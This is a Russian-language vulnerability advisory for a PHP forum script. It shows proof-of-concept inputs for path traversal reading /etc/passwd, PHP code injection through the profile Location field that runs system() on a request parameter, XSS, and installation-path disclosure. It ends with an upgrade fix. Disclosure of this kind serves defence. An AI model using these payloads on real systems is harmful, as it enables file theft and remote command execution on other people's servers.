Описание:
1) Раскрытие системной информации:
Вы можете просматривать файлы (за исключением .php скриптов)
используя символы '../' и %00, к примеру:
http://target]/[path]/pblang/setcookie.php?u=../../../../../etc/passwd%00
Уязвимый код в скрипте setcookie.php:
…
16 $usrname=$HTTP_GET_VARS['u'];
17 include($dbpath.'/'.$usrname.'temp');
…
2) Удаленное выполнение кода:
Форум хранит информацию в файлах, и когда вы регистрируетесь, создается файл, без расширения,
который называется по имени пользователя, и сохраняется в директории /db/members,
Внутри этого механизма, мы можем выполнить люой php-код:
Вводим в свойствах пользователя, в поле Location:
madrid"; system($HTTP_POST_VARS[cmd]); echo «
Теперь в файле /db/members/[username] мы имеем:
…
$userlocation=»madrid"; system($HTTP_GET_VARS[cmd]); echo "";
…
4) Межсайтовый скриптинг.
В поле Location, в профайле зарегистрированного пользователя введите:
madrid"; echo "
Затем проверьте этот URL:
http://[target]/[path]/setcookie.php?u=[username]%00
5) Раскрытие установочного пути:
http://[target]/[path]/setcookie.php?u=%00
Решение: Поставьте последнюю версию форума.
